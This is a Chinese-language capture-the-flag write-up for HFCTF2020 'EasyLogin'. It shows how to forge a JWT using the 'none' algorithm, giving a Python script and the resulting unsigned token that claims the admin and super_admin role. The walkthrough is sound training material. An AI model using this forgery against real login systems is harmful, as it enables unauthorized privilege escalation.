[HFCTF2020]EasyLogin

[HFCTF2020]EasyLogin

打开题目便是登录界面,先进行注册

登录成功,发现提示讲flag就在这里,这里有输入框,输入flag,点击GET FLAG

返回权限被拒绝

查看源代码但是没有发现什么,但是抓登录的数据包时发现了jwt,所以这应该是通过修改jwt中的权限信息来获得admin权限

将其放到https://www.jwt.io/中查看,jwt信息格式:前两部分均是base64加密,第三部分加密方式为第一部分声明的加密算法结合密匙进行加密

然后就想着获取密匙,但是未成功,在网上看到:当加密时使用的是 none 方法,验证时只要密钥处为 undefined 或者空之类的,即便后面的算法指名为 HS256,验证也还是按照 none 来验证通过,那这样的话我们就可以直接伪造jwt的信息了,对header和payload部分信息分别进行修改和加密,然后拼接加密后的字符串(注意删掉填充符=),结果如下:

复制代码
import base64
import json


def base64_url_encode(data):
    b64_encoded = base64.b64encode(data.encode('utf-8')).decode('utf-8')
    return b64_encoded.rstrip('=').replace('+', '-').replace('/', '_')
header = {
        "alg": "none",
        "typ": "JWT"
    }
payload = {
        "secretid": [],
        "username": "admin",
        "password": "123456",
        "iat": 1773737892,
        "role": "super_admin"
    }
encoded_header = base64_url_encode(json.dumps(header, separators=(',', ':')))
encoded_payload = base64_url_encode(json.dumps(payload, separators=(',', ':')))

print("Base64URL编码后的Header(无填充符=):")
print(encoded_header)
print("\nBase64URL编码后的Payload(无填充符=):")
print(encoded_payload)

最终的JWT为:

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTc3MzczNzg5Miwicm9sZSI6InN1cGVyX2FkbWluIn0.

用新生成的JWT来替换掉原来的JWT,然后讲username改为admin(当时做的时候就忘记改了,发现返回的是false,浪费了一些时间)

admin登录成功后,查询flag,然后抓包

将查询处抓包的cookie值换成登录包中的cookie值,发送就可以获得flag了

相关推荐
kiku181814 小时前
Nginx安全
nginx·web安全·https
cramer_50h19 小时前
网络安全技术研究:渗透测试环境和APP安全测试教程(二)
安全·web安全
上海云盾-小余20 小时前
出海业务高可用方案:全球节点 + 智能清洗,让 DDoS 与网络故障不再影响业务
网络·安全·web安全·ddos
lplum_20 小时前
2026 中国高校智能机器人创意大赛 软件系统安全赛 初赛wp
安全·web安全·网络安全·系统安全·密码学·网络攻击模型·安全威胁分析
m0_7381207221 小时前
应急响应——知攻善防挖矿事件应急溯源详细过程
网络·数据库·安全·web安全
Atomic121381 天前
隧道搭建之端口复用
web安全·网络安全·渗透测试
李白你好1 天前
SQLMap-FluX 二开Bypass版 | 有效检测并绕过WAF的特征识别与频率检测
web安全
瘾大侠1 天前
HTB - VariaType
网络·安全·web安全·网络安全
白帽子黑客-宝哥1 天前
应急响应是什么?网络安全事件的“消防队”
网络·安全·web安全·应急响应·攻防演练